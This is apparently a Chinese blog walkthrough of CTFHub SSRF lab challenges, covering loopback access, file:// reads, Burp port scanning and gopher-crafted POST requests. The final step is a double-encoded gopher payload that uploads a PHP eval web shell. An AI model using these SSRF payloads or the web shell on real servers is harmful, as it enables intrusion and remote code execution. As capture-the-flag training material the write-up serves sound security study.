cthub-ssrf通关攻略

embedded/2024/10/18 20:19:51/

内网访问 

一.进入页面,选择内网访问

二.开启题目,点击题目中的链接

 然后就进来页面了

三.在url里输入

http://127.0.0.1/flag.php就可以得到flag 

四.提交flag

伪协议读取文件

一开启题目

二.点击进入链接 

三.输入file:///var/www/html/flag.php 然后发现页面不显示,查看页面源代码然后就得到flag

端口扫描 

一.开启端口扫描点击如图中链接

二.进入如图所示页面输入http://127.0.0.1:8000 

 

 三.打开burp抓包,发送到攻击器

先清除playload然后再8000的地方上添加playload 

 四.如图所示修改里面的值

 五.跑出来之后点开响应包可以查看flag

post请求

一.开启题目,点击题目链接 

 二.输入http://127.0.0.1/flag.php弹出一个框

打开页面源代码,复制key粘贴到提交框中 

 三.打开brup抓包,将抓到的数据留下如图所示内容修改为gopher构造post请求数据包

四.将里面内容进行俩次url编码 

五.然后关闭抓包,再次回到页面

六.输入gopher://127.0.0.1:80/_POST%20/flag.php%20HTTP/1.1%0D%0AHost:127.0.0.1:80%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2036%0D%0A%0D%0Akey=6800122d69cd52dcc2aa3dafbe6c1c3c%0D%0A编号的url编码最后得出flag 

上传文件

一.点击开启,点入所给出的链接

 

二.进入浏览页面输入http://127.0.0.1/flag.php

出现上次文件

 发现没有提交按钮,我们自己往上写一个提交按钮

然后我们在自己写1.txt个文件进行提交

 

 

三.然后打开brup抓包 

在抓包页面进行编辑 

四.将抓好的内容进行俩次编码 

 

 五. 输入编码

gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:127.0.0.1:80%250D%250AUser-Agent:%2520Mozilla/5.0%2520(Windows%2520NT%252010.0;%2520Win64;%2520x64;%2520rv:129.0)%2520Gecko/20100101%2520Firefox/129.0%250D%250AAccept:%2520text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8%250D%250AAccept-Language:%2520zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2%250D%250AAccept-Encoding:%2520gzip,%2520deflate%250D%250AContent-Type:%2520multipart/form-data;%2520boundary=---------------------------13738711502688661258731329629%250D%250AContent-Length:%2520381%250D%250AOrigin:%2520http://challenge-9da34af1f24d33c6.sandbox.ctfhub.com:10800%250D%250AConnection:%2520close%250D%250AReferer:%2520http://challenge-9da34af1f24d33c6.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests:%25201%250D%250APriority:%2520u=0,%2520i%250D%250A%250D%250A-----------------------------13738711502688661258731329629%250D%250AContent-Disposition:%2520form-data;%2520name=%2522file%2522;%2520filename=%25221.php%2522%250D%250AContent-Type:%2520application/octet-stream%250D%250A%250D%250A%253C?php%2520@eval($_POST%255B'cmd'%255D);?%253E%250D%250A-----------------------------13738711502688661258731329629%250D%250AContent-Disposition:%2520form-data;%2520name=%2522submit%2522%250D%250A%250D%250A%25E9%258E%25BB%25E6%2584%25AA%25E6%25B0%25A6%25E9%258F%258C%25E3%2583%25A8%25EE%2587%2597%250D%250A-----------------------------137387115026886612587313296%250D%250A得到flag进行提交

 


http://www.ppmy.cn/embedded/101697.html

相关文章

android aar适配uniapp

最近有商户需要接入我们sdk,但是我们都是android或者ios原生的,直接用又不能用,需要做适配,本文就教你一步步实现android aar适配uniapp。 官方参考教程:开发者须知 | uni小程序SDK 但是官方写的比较繁琐,好…

AD7606芯片驱动-FPGA实现

简介 AD7606是一款16位ADC芯片,可实现8通道并行采集,每通道最大速度可达1M,可实现多种模式数据采集。 介绍 本次FPGA使用的是8通道串行采样模式,设计中所用到的AD7606引脚说明如下: 名称定义CONVST同步采集转换开始信…

Shopify/shopline等独立站paypal快速提现到国内银行卡

做shopify/shopline/shopyy/shoplazza独立站用得最多的收款方式为paypal。 下面介绍如何把paypal里面的资金提现到我们国内银行卡,收款工具是GeeWallet。 1、注册GeeWallet注册入口 2、打开链接,填入手机号或者邮箱,点击立即注册 3、在注册…

网络安全——基础知识记忆梳理

1. SQL注入攻击 SQL注入攻击是一种常见的网络安全威胁,它利用Web应用程序中对用户输入的数据的不正确处理,攻击者可以在SQL查询中注入恶意代码,从而执行非授权的数据库操作。这种攻击方式可以导致数据泄漏、数据篡改、绕过认证等多种安全问题…

【网络安全】分析cookie实现PII IDOR

未经许可,不得转载。 文章目录 正文正文 目标:公共电子商务类型的网站,每月有大约6万到10万访问者,注册用户大约有5万。 存在一个查询个人资料的端点/GetProfiledetails,以下是完整的请求和响应: 我发现,cookie非常类似于base64编码后的结果,于是我将其进行base64解码…

C++初学(16)

16.1、if语句 当C程序必须决定是否执行某个操作时,通常使用if语句来实现选择。if有两种格式:if和if else。 if语句的语法与while相似: if(text-condition)statement 如果text-condition(测试条件)为true&#xff0…

OpenCV几何图像变换(10)透视变换函数warpPerspective()的使用

操作系统:ubuntu22.04 OpenCV版本:OpenCV4.9 IDE:Visual Studio Code 编程语言:C11 算法描述 warpPerspective 函数使用指定的矩阵对源图像进行透视变换: dst ( x , y ) src ( M 11 x M 12 y M 13 M 31 x M 32 y M 33 , M…

Python(R)均方根误差平均绝对误差导图

🎯要点 回归模型评估指标评估薪水预测模型评估员工倦怠率模型评估大气分析生成式对抗模型目标对象缺失下,性能估算法追踪模型误差指标降尺度大气学模拟模型准确性评估蛋白染色质相互作用模型评估 Python回归误差指标 平均绝对误差表示数据集中实际值和…